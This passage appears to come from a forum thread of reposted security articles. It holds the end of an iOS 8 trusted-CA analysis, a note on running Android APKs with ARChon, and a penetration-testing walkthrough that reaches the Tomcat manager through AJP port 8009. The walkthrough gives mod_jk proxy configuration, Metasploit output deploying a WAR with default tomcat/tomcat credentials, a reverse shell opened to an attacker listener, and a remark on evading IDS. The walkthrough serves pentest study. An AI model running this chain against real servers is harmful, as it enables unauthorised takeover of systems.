don’t hold that against Symantec, though: Most of the CAs were issued before the purchase, and it’s too much trouble for all of their customers to switch over to Symantec roots. Even so, I really start to wonder: How many certificate authorities does one company actually need? Governments There are a number of governments whose CAs are included in iOS 8.0: China: 1 CA, via the China Internet Network Information Center Hong Kong: 1 CA, via the Hongkong Post e-Cert. Japan: 3 CAs, via GPKI and the Ministry of Public Management, Home Affairs, Posts, and Telecommunications (MPHPT) Netherlands: 3 CAs, via PKIoverheid Taiwan: 1 CA, via the Government Root Certification Authority Turkey: 1 CA, via the Scientific and Technological Research Council of Turkey United States: 5 CAs, via the Department of Defense Those were just the countries whose names I was able to pick out. When it comes to web sites, it looks like there’s no need to crack the encryption, and you probably don’t even need an inside line to Verisign! You can just issue your own faux-Microsoft cert (or faux-Google, or faux-Apple, or …) using one of your own governmental CAs, which iOS already recognizes. Unfortunately, I can not see any way (in Safari on iOS 8.0) to get information on the certificate chain for a web site. In other words, I can’t tell if the certificate for secure1.store.apple.com was issued by VeriSign, or if it was issued by the US Department of Defense. Safari does show the green URL bar and company name for EV certificates, but I have no way of knowing ahead of time that Apple uses an EV certificate for their sites. Final Thoughts First of all, it’s good that Apple has posted the list, and I do believe it to be a complete list. That said, I do wish there was a way in iOS Safari for me to see the details of the site’s certificate, and the chain from the certificate up to the root. Maybe this is something that could be implemented as an extension? The security-concious (or maybe security-paranoid?) will take note of the CAs that are using questionable ECC curves, and those CAs that are using MD-2 or MD-5 signature hashes. Other people will also take note of the countries whose governments have their CAs in iOS 8.0, making it so much easier for them to impersonate web sites of their choosing. There is no way to disable any of the root CAs that comes with iOS, so it is very much a take-it-or-leave-it situation. I wonder, is Android the same way, or does Android allow you to uninstall or disable CAs that you don’t like? With all the work that Apple does to secure iOS devices, that makes me trust Apple enough to take it. I’m going to continue using my iPhone 5, with iOS 8.0. Sursa: An Analysis of the CAs trusted by iOS 8.0 | Karl's Notes
-
Run Android APKs on Chrome OS, OS X, Linux and Windows. Now supports OS X, Linux and Windows See the custrom ARChon runtime guide to run apps on other operating systems besides Chrome OS. Quick Demo for Chrome OS Download an official app, such as Evernote, from the Chrome Web Store. Then download this open source game: 2048.APK Game by Uberspot and load it as an unpacked extension. Press "Launch", ignore warnings. Sursa: https://github.com/vladikoff/chromeos-apk
-
8009, the forgotten Tomcat port We all know about exploiting Tomcat using WAR files. That usually involves accessing the Tomcat manager interface on the Tomcat HTTP(S) port. The fun and forgotten thing is, that you can also access that manager interface on port 8009. This the port that by default handles the AJP (Apache JServ Protocol) protocol: What is JK (or AJP)? AJP is a wire protocol. It an optimized version of the HTTP protocol to allow a standalone web server such as Apache to talk to Tomcat. Historically, Apache has been much faster than Tomcat at serving static content. The idea is to let Apache serve the static content when possible, but proxy the request to Tomcat for Tomcat related content. Also interesting: The ajp13 protocol is packet-oriented. A binary format was presumably chosen over the more readable plain text for reasons of performance. The web server communicates with the servlet container over TCP connections. To cut down on the expensive process of socket creation, the web server will attempt to maintain persistent TCP connections to the servlet container, and to reuse a connection for multiple request/response cycles It’s not often that you encounter port 8009 open and port 8080,8180,8443 or 80 closed but it happens. In which case it would be nice to use existing tools like metasploit to still pwn it right? As stated in one of the quotes you can (ab)use Apache to proxy the requests to Tomcat port 8009. In the references you will find a nice guide on how to do that (read it first), what follows is just an overview of the commands I used on my own machine. I omitted some of the original instruction since they didn’t seem to be necessary. (apache must already be installed) sudo apt-get install libapach2-mod-jk sudo vim /etc/apache2/mods-available/jk.conf # Where to find workers.properties # Update this path to match your conf directory location JkWorkersFile /etc/apache2/jk_workers.properties # Where to put jk logs # Update this path to match your logs directory location JkLogFile /var/log/apache2/mod_jk.log # Set the jk log level [debug/error/info] JkLogLevel info # Select the log format JkLogStampFormat "[%a %b %d %H:%M:%S %Y]" # JkOptions indicate to send SSL KEY SIZE, JkOptions +ForwardKeySize +ForwardURICompat -ForwardDirectories # JkRequestLogFormat set the request format JkRequestLogFormat "%w %V %T" # Shm log file JkShmFile /var/log/apache2/jk-runtime-status sudo ln -s /etc/apache2/mods-available/jk.conf /etc/apache2/mods-enabled/jk.conf sudo vim /etc/apache2/jk_workers.properties # Define 1 real worker named ajp13 worker.list=ajp13 # Set properties for worker named ajp13 to use ajp13 protocol, # and run on port 8009 worker.ajp13.type=ajp13 worker.ajp13.host=localhost worker.ajp13.port=8009 worker.ajp13.lbfactor=50 worker.ajp13.cachesize=10 worker.ajp13.cache_timeout=600 worker.ajp13.socket_keepalive=1 worker.ajp13.socket_timeout=300 sudo vim /etc/apache2/sites-enabled/000-default JkMount /* ajp13 JkMount /manager/ ajp13 JkMount /manager/* ajp13 JkMount /host-manager/ ajp13 JkMount /host-manager/* ajp13 sudo a2enmod proxy_ajp sudo a2enmod proxy_http sudo /etc/init.d/apache2 restart Don’t forget to adjust worker.ajp13.host to the correct host. A nice side effect of using this setup is that you might thwart IDS/IPS systems in place since the AJP protocol is somewhat binary, but I haven’t verified this. Now you can just point your regular metasploit tomcat exploit to 127.0.0.1:80 and take over that system. Here is the metasploit output also: msf exploit(tomcat_mgr_deploy) > show options Module options (exploit/multi/http/tomcat_mgr_deploy): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD tomcat no The password for the specified username PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) Proxies no Use a proxy chain RHOST localhost yes The target address RPORT 80 yes The target port USERNAME tomcat no The username to authenticate as VHOST no HTTP server virtual host Payload options (linux/x86/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.195.156 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf exploit(tomcat_mgr_deploy) > exploit [*] Started reverse handler on 192.168.195.156:4444 [*] Attempting to automatically select a target... [*] Automatically selected target "Linux x86" [*] Uploading 1648 bytes as XWouWv7gyqklF.war ... [*] Executing /XWouWv7gyqklF/TlYqV18SeuKgbYgmHxojQm2n.jsp... [*] Sending stage (36 bytes) to 192.168.195.155 [*] Undeploying XWouWv7gyqklF ... [*] Command shell session 1 opened (192.168.195.156:4444 -> 192.168.195.155:39401) id uid=115(tomcat6) gid=123(tomcat6) groups=123(tomcat6) References FAQ/Connectors - Tomcat Wiki AJPv13 Rajeev Sharma: Configure mod_jk with Apache 2.2 in Ubuntu Sursa: https://diablohorn.wordpress.com/2011/10/19/8009-the-forgotten-tomcat-port/